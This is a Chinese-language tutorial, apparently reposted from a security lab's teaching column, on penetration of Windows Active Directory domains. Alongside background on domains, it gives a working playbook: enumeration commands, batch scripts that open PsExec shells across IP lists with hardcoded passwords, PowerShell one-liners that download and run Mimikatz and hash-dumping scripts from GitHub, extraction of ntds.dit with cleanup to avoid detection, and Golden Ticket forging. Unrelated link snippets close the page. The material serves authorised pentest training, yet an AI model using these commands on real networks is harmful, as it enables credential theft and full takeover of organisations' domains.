3、域渗透详解

2023-11-02

在渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内网的域渗透。

通常,我们是以获得域控制器的权限为目标,因为一旦域控制器沦陷,整个内网就尽在掌握中了,在学习域渗透之前,我们需要了解一些基础知识,本期“安仔课堂”,ISEC实验室的秦老师为大家一一讲解。

一、什么是域

将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫做域,域是组织与存储资源的核心管理单元,在域中,至少有一台域控制器,域控制器中保存着整个域的用户帐号和安全数据库。



那么域网络结构有什么优点呢?域的优点主要有以下几个方面:

1、权限管理比较集中,管理成本降低

域环境中,所有的网络资源,包括用户均是在域控制器上维护的,便于集中管理,所有用户只要登入到域,均能在域内进行身份验证,管理人员可以较好的管理计算机资源,管理网络的成本大大降低;同时在域环境中也可以防止企业员工在域成员主机上违规安装软件,增强客户端安全性,减少客户端故障,降低维护成本。

2、保密性加强

有利于企业的一些保密资料的管理,可以单独对资源进行权限控制,允许或拒绝特定的域账户对资源的请求。

3、安全性加强

使用漫游账户和文件夹重定向,个人账户的工作文件及数据等可以存储在服务器上,进行统一备份及管理,使用户的数据更加安全有保障;同时域控制器能够分发应用程序、系统补丁,用户可以选择安装,也可以由系统管理员指派自动安装,数据及系统安全性大大提高。

4、提高了便捷性

可由管理员指派登陆脚本映射,用户登录后就可以像使用本地盘符一样,使用网络上的资源,且不需要再次输入密码。

基于以上原因,很多企业的内网均会采用域环境,所以作为一名合格的渗透测试人员,域渗透的常规思路和技巧要熟练掌握。

二、域的特性

域成员计算机在登录的时候可以选择登录到域中或此计算机,登陆到域中的时候,身份验证是采用Kerberos协议在域控制器上进行的,登陆到此计算机则是通过SAM来进行NTLM验证的,如下图:


默认情况下,域用户可以登录到域中所有的工作站,不包括域控制器,管理员也可以指定具体的计算机,域用户信息保存在活动目录中,如下图:



三、域渗透思路

一个具有一定规模的企业,每天都可能面临员工入职和离职,因此网络管理部门经常需要对域成员主机进行格式化消除磁盘的文件,然后重装系统及软件,以提供给新员工使用;因此,为了便于后期交接,大多网络管理员会做好一个系统镜像盘,统一安装所有的电脑,并且在安装的时候设置惯用、甚至统一的密码。

因此,域中的计算机本地管理员账号,极有可能能够登陆域中较多的计算机,本地管理员的密码在服务器上后期修改的概率,远低于在个人办公电脑上的概率,而域用户权限是较低的,是无法在域成员主机上安装软件的,这将会发生下面的一幕:

某个域用户需要使用viso软件进行绘图操作,于是联系网络管理员进行安装,网络管理员采用域管理员身份登录了域成员主机,并帮助其安装了viso软件,于是这个有计算机基础的员工,切换身份登录到了本地计算机的管理员,后执行mimikatz,从内存当中抓取了域管理员的密码,便成功的控制了整个域。

因此,域渗透的思路就是:通过域成员主机,定位出域控制器IP及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机IP,设法从域成员主机内存中dump出域管理员密码,进而拿下域控制器、渗透整个内网。

四、域渗透常用指令

以下所有指令均为在域成员主机上执行的结果。

得到域控制器的IP:dsquery server


得到域控制器主机名:net group “domain controllers” /domain,注意通过该指令得到的机器名后面会多一个$符号,如下图:


查询域管理用户:net group “domain admins” /domain


查看所有域用户: net user /domain


这里有一个特殊用户叫做krbtgt,该用户是用于Kerberos身份验证的帐户,获得了该用户的hash,就可以伪造票据进行票据传递攻击了,此外,还有以下几个常用指令:

查询当前登陆域:net config workstation

查询域密码策略:net accounts /domain

查看补丁信息:wmic qfe

查看操作系统类型:wmic os

当我们获得了某个本地管理员权限的账号,我们想通过该账号访问内网其他主机,常用的做法有net use建立Ipc$连接、wmic指令连接、采用rdp方式连接、当然也可以使用“计算机管理–连接到另一台计算机”的功能来进行操作,除此之外,笔者更喜欢使用psexec进行远程连接,如下图:


如果觉得一台一台手工连接比较麻烦,也可以进行批量连接,批量反弹cmdshell回来,可以采用如下批处理:

@echo off

echo check ip addr config file…

if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end

echo read and analysis file…

for /F “eol=#” %%i in (ip.txt) do start PsExec.exe \\%%i -accepteula -u administrator -p “123456″ cmd & start cmd /c PsExec.exe \\%%i -u administrator -p “123456″ cmd

:end

exit


当返回了cmdshell后,我们就可以逐一读取内存,去抓取域管理员的密码,这里可以结合powershell来进行快速操作,无需上传文件:

抓明文:

powershell IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1′); Invoke-Mimikatz –DumpCerts

抓hash:

powershell IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1′);Get-PassHashes

这种方式的好处是只要域管理员登陆过目标计算机,即使注销了会话,一样可以从内存读取到密码,但实际的渗透过程中,我们往往追求的是效率,如何快速找到域管理员登陆过哪台计算机,并且还存在活动会话,优先级更高一些,我们可以使用如下指令:


这里ip.txt是需要遍历的IP列表,1.bat中的指令为tasklist /v |find “域管理员”,这样我们只需要在返回的cmdshell当中,去查看是否含有域管理员字样的会话,如果有,则表示该主机上曾经登陆过域管理员,可以去dump内存密码了。

另外我们也可以使用Tasklist命令查看远程主机任务列表,这里一样是搜索含有域管理员字样的任务列表,如下图:


基于以上原理,我们可以写一个更加自动化的批处理:

@echo off

echo check ip addr config file…

if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end

echo read and analysis file…

for /F “eol=#” %%i in (ip.txt) do echo %%i &(echo %%i &tasklist /s %%i /u administrator /p mytest2010 /v) >>d:\result.txt

:end

exit

上述指令的作用就是采用指定的用户名和密码去遍历ip.txt中的IP列表,并打印任务列表,将结果输出到result.txt当中,执行完了上述批处理,我们只需要稍作等待,最后去查看result.txt当中是否含有域管理员字样,即可确定哪些主机上存在域管理员的活动会话,如下图:

五、域用户hash提取

域用户帐户以域数据库的形式保存在活动目录中,ntdsutil.exe是域控制器自带的域数据库管理工具,从windows 2008就默认自带了,因此我们可以通过域数据库,提取出域中所有的域用户信息,在域控上依次执行如下命令,导出域数据库:

Ntdsutil –snapshot—activate instance ntds—create—mount {guid}—copy 装载点\windows\NTDS\ntds.dit d:\ntds_save.dit


域数据库装载完毕,即可进行复制,如下图:


最后执行unmount {guid}—delete {guid}–quit删除装载点即可,避免被发现,接着上传工具QuarksPwDump到域控制器上,然后执行如下命令,成功提取用户hash,如下图:

QuarksPwDump –dump-hash-domain –ntds-file d:\ntds_save.dit

注意上面的操作必须在域控制器上,否则会出现如下错误,这是因为打开域数据库需要用到相应的数据库引擎,如下图:


除了上面的操作方法外,还可以使用mimikatz一条命令,获取域控制器上所有用户的hash:

mimikatz log “privilege::debug” “lsadump::lsa /patch”


六、票据传递攻击

域中每个用户的Ticket都是由krbtgt的密码Hash来计算生成的,因此只要我们拿到了krbtgt的密码Hash,就可以随意伪造Ticket,进而使用Ticket登陆域控制器,使用krbtgt用户hash生成的票据被称为Golden Ticket,此类攻击方法被称为票据传递攻击。

首先,我们来生成Golden Ticket,这里需要修改相应的域管理员账号、域名称、sid值,如下图:


接着我们使用如下指令导入票据:


导入成功后,我们在域成员主机上执行klist,即可查看缓存的票据,如下图:


最后,我们就可以使用票据传递攻击,登陆域控了,如下图:

因此,在域渗透过程如果发现域管理员的密码已经修改,可尝试利用krbtgt用户的历史hash来进行票据传递攻击,krbtgt用户的密码一般不会有人去修改。

此外,域渗透过程中可能会使用到MS14-068这个漏洞,微软给出的补丁是kb3011780,在server 2000以上的域控中,如果没有打这个补丁,那么情况将比较糟糕,利用该漏洞可以将任何一个域用户提权至域管理员权限,危害极大。


本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

3、域渗透详解 的相关文章

  • 爬取豆瓣电影排行榜top 250

    coding utf 8 import requests import re os 爬取豆瓣250 def douban ranking start 构建请求 param start start filter respon requests
  • 使用VS Code断点调试PHP

    vs code 使用一款杰出的轻量级代码编辑器 其中的插件工具不胜枚举而且还在不断增加 使用 vs code 调试 php 代码更是方便简洁 下面我们来一起看一下 1 安装 XDebug 扩展 调试 php 代码最常用的就是 XDebug
  • python:ezdxf——如何使用

    官方文档 https ezdxf readthedocs io en master howto index html 文章目录 一 基本文件 1 设置 获取标头变量 2 设置DXF绘图单元 3 创建更具可读性的DXF文件 DXF漂亮打印机
  • 下载vant源码在本地查看小程序模版

    官网地址 Vant地址 运行 git clone git github com youzan vant weapp git cd vant weapp npm install npm run dev 接着打开微信开发者工具 导入exampl
  • Rethinking BiSeNet For Real-time Semantic Segmentation

    Rethinking BiSeNet For Real time Semantic Segmentation 摘要 BiSeNet已经被证明是一种流行的实时分割的双流网络 然而 其增加额外路径来编码空间信息的原理是耗时的 并且从预训练的任务
  • OSS操作示例

    一 OSS API文档 https www alibabacloud com help zh doc detail 103185 htm spm a2c63 l28256 b99 879 7d315cc5HEvVNn 二 demo ifnd
  • Linux调试工具

    addr2line translates addresses into file names and line numbers Given an address in an executable or an offset in a sect
  • JDBC原始版本,未封装

    JDBC原始版本 未封装 public static void main String args Connection connection null PreparedStatement preparedStatement null Res
  • fastadmin 部署模板变量

    对于 view 内的HTML 可以直接使用 this gt assign group chat id get group chat id
  • Check—强大的C语言单元测试框架

    1 前言 在看基数树源码时 发现源码里面有个deps的依赖文件夹 deps里是一个叫Check的源码安装包 Google之后发现Check原来是C语言单元测试框架 关于单元测试 Wikipedia的介绍点这里 Check 最主要的优点是对于
  • HR SaaS厂商,进入决赛圈

    在愈发需要降本增效的节点 数字化的价值也更在被越来越多的企业重新审视 这种重视不再是之前或有或无的可选项 而是基于真正人效比维度的必选项 作者 斗斗 编辑 皮爷 出品 产业家 SaaS行业 正在发生一些微妙的变化 以HR SaaS赛道为例
  • 红帽企业版linux 7.3,红帽推企业Linux 7.3 新功能特性一览

    原标题 红帽推企业Linux 7 3 新功能特性一览 IT168 云计算 日前红帽宣布推出企业Linux 7 3版本 作为Linux平台的最新版本 红帽方面透漏本次更新的版本在网络与存储功能两方面做到了强化 同时 该版本还引入了关于Linu
  • 跨域ajax原理,跨域 ajax 请求之 cors 原理解析

    本博客不欢迎 各种镜像采集行为 请尊重知识产权法律法规 大家都是程序员 不要闹得不开心 本文是系列文章 上一篇文章地址是 https newsn net say cross domain ajax jsonp html 本文主要说两个高级点
  • 写爬虫遇到验证码识别问题的解决方案

    写爬虫遇到验证码识别问题的解决方案 遇到滑块问题 在写爬虫的时候 经常会遇到滑块问题 很多次都想过尝试如何攻破滑块 但是每次都没成功 除了最开始的极验滑块 当时通过原图和滑块图的对比 能够得出缺口坐标 但是随着极验 网易 腾讯滑块的更新 已
  • 图(Graph)——图的遍历算法

    图 Graph 图的遍历算法 前言 深度优先搜索 广度优先搜索 前言 有了图的存储结构以后 就要考虑解决图的相关问题 关于图的算法有很多 比如最小生成树 最短路径 拓扑排序等 这些算法以后有空补上 现在主要记录图的遍历算法 在介绍前 先给出
  • 贪心之商人的诀窍

    商人的诀窍 Time Limit 1000 ms Memory Limit 65536 KiB Submit Statistic Problem Description E star和von是中国赫赫有名的两位商人 俗话说的好无商不奸 最近
  • web端生成pdf,前端生成pdf导出并自定义页眉页脚

    web前端生成pdf文档 2023 06 15 根据码友 咔布哩 需求补充完善一丢丢功能 2023 05 08 重新整理 封装目录结构图 generatePdfFile config js generatePdfFile index js
  • dede后台-系统基本参数无法保存中文/显示空白

    dede后台 系统基本参数无法保存中文 显示空白解决办法 dede templets sys info htm里面搜索 htmlspecialchars row value 替换成 htmlspecialchars row value EN

随机推荐

  • C++—C++程序基础

    文章目录 1 数据类型 1 1 基本数据类型 1 2 字面值常量 1 3 左值和右值 1 4 引用与指针 2 基本输入输出 2 1 输出 2 2 输入 3 函数 3 1 内联函数 3 2 函数的重载 1 数据类型 1 1 基本数据类型 在C
  • 用c语言编写九九乘法表

    这个需要使用两重循环来实现 我们用i表示行 外面一层循环 for i 1 i lt 9 i 外循环 从第一行到第九行 第一步 输出该行的乘法式子 第二步 该行结束换行 我们只需要将中间2步补充完整即可 第二步换行比较简单 printf n
  • 1P+N

    1p n是什么意思 单极二线 就是 一个单片空气开关 和一个漏电保护模块组合在一起的开关 火线 零线一起进出组合开关 当漏电发生时漏电模块带动空气开关跳闸 火线和外网电断开 但是零线是不断开的
  • 公共子串计算

    h1 公共子串计算 h1
  • 双线macd指标参数最佳设置_mt5怎么添加双线macd?mt5中macd怎么设置快慢线?

    在mt4平台中怎么添加双线macd指标 的设置要求是这样的 将MACD的快速EMA参数设定为8 将慢速EMA参数设定 打开mt4 菜单栏选择 数据文件夹 mql4 indicator 将技术指标复制粘贴进去 然后关闭mt4重新打开 菜单栏
  • Android Studio打开XML文件Design显示Waiting for build to finish

    Android Studio打开XML文件Design显示Waiting for build to finish 项目编译完 Design的界面一直出现如下图所示情况 解决方法一 重构项目 按下 ctrl shift A 输入 Sync P
  • [spring处理webservice报文] 3 rest处理soap报文

    目录 1 背景 2 rest请求处理soap报文 2 1 创建controller 3 调试 1 背景 前面两篇讲解了spring处理soap报文的囧途 如下 这一篇讲解下spring如何通过post类型的请求来处理soap报文 sprin
  • rust的错误和异常

    一 错误和异常 在所有语言中 对程序运行不按照设计的 套路 出牌 都是错误 异常可以理解成程序的错误引发了运行的故障 甚至导致程序崩溃 正因为如此 对错误和异常的处理是所有语言都必须拥有的一个行为 无论是从语法层面还是从运行检查层面 都是无
  • 51单片机PWM输出

    PWM输出 学期快结束了 51单片机的学习也差不多告一段落 也快要转入新的学习阶段 寒假找个时间看看32 小白哈哈哈 下面是我学习51定时器弄出来的小东西 一个PWM的输出 还请大神指点 刚开始觉得PWM输出应该不难 很容易做的 但是后面越
  • Spring Boot使用Scheduled完成自动任务

    说明 Scheduled注解可以控制方法定时执行 其中有三个参数可选择 1 fixedDelay控制方法执行的间隔时间 是以上一次方法执行完开始算起 如上一次方法执行阻塞住了 那么直到上一次执行完 并间隔给定的时间后 执行下一次 2 fix
  • layui php phpexcel导出,Yii2 基于 layui 的 Excel 上传并导入数据(含分页)

    安装命令 composer require phpoffice phpexcel 引入layui包 我这里用的是2 4 5的版本 请自行下载对应版本 layui前台页面 导入文件 卡号信息 layui use form element up
  • 【python随笔】之【将doc、docx文件保存为txt文件】

    import win32com client def change word to txt word path save path print 读取中 word win32com client Dispatch Word Applicati
  • vector 操作

    C 内置的数组支持容器的机制 但是它不支持容器抽象的语义 要解决此问题我们自己实现这样的类 在标准C 中 用容器向量 vector 实现 容器向量也是一个类模板 标准库vector类型使用需要的头文件 include
  • 汇编语言笔记-keil5软件仿真及调试

    目录 keil5调试功能 软件仿真设置 硬件调试设置 调试方法 调试选项及介绍 调试窗口 Command Disassembly Symbols Registers Call Stack Locals Watch Memory Serial
  • 赶快进来!!!手把手教你贪吃蛇

    一 大体框架 这里和前面写过的游戏一样 大体框架都是这样 有个简要的目录 我们主要是对play 函数进行封装 由于我们引用了自己的头文件 game h 所以我们可以把所要引用的库函数的预处理指令都放在 game h 的头文件中 如果你细心的
  • Vue3中vuex的基本使用

    一 基本结构 src store index js中 代码如下 vue3中创建store实例对象的方法createStore 按需引入 import createStore from vuex export default createSt
  • pywt 安装学习

    安装 conda install c conda forge pywavelets github地址 里面有demo https github com PyWavelets pywt 这个是学习笔记 https blog csdn net
  • UPC--扑克牌

    题目描述 从一副含有n n 10000 张的扑克牌 显然每张扑克牌都不相同 中 分给m m 100 个人 第i个人得到ai 0 ai 100 张牌 求一共有几种分法 这个数可能非常大 请输出此数模10007后的结果 输入 第一行两个整数 为
  • HDU1874 单源最短路经 dijkstra或者floyd

    include
  • 3、域渗透详解

    在渗透测试过程中 我们经常会遇到以下场景 某处于域中的服务器通过路由做端口映射 对外提供web服务 我们通过web脚本漏洞获得了该主机的system权限 如果甲方有进一步的内网渗透测试需求 以证明企业所面临的巨大风险 这个时候就需要做内网的